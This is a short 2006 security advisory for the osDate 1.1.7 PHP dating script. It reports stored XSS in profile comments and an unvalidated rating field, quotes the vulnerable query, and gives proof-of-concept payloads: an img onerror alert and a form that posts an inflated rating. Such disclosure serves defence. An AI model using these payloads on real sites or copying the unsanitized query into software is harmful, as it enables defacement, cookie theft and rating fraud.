osDate 1.1.7 multiple vulnerabilities
/*\ osDate 1.1.7 advisory /*\
Date of written Advisory:
-------------------------
July, 18 2006
Product:
--------
OSdate <= 1.1.7
Vendor:
-------
http://tufat.com/
Description:
------------
osDate is a full fledged dating script which can be eaily integrated with phpBB
and flashChat, and provides various payment methods.
Exploit(s) / Vulnerability(ies):
--------------------------------
osDate 1.1.7 is prone to XSS attacks, which allow an attacker a method through
which to steal cookies and deface user's profiles, as well as boost their own
ratings by passing unreasonably large votes.
Two variables are not sanitized properly before being used.
here is a comment being written to the database, with no sanitization:
...
$db->query( $sql, array( USER_RATING_TABLE, $_SESSION['UserId'], $_GET['id'],
'0', time(), $_GET['ratingid'], substr($_POST["txtcomment"],0,250),
date("Y/m/d") ) );
...
The second problem exists in the rating. $_POST['txtrating'] is not checked
to make sure it is a valid value. the string is simmply accepted and written
to the database. Because the rating is decided based on an average of all of
the ratings, passing a large rating (such as 100) will preserve a perfect 10
rating.
PoC(s):
-------
A user's page could be defaced by simply posting a comment with the following
text:
<img src="NOEXIST.NULL" onerror="alert('XSS')">
When the user's profile comments are viewed, the alert/compramised page will
appear.
As for the rating exploit:
<form method="post"
action="http://site.com/showprofile.php?id=????&ratingid=?&action=rate";>
<select name="txtrating">
<option value="100">Boost your rating!</option>
</select>
<input name="submit" class="formbutton" value="Submit Rating" type="submit">
Vendor Status:
--------------
Vendor was not informed before publication.
Solution:
---------
The vendor has yet to publish a solution for either exploit.
Credits:
--------
binaryloc
binaryloc[at]gmail[dot]com
http://binary.copyleftwriting.org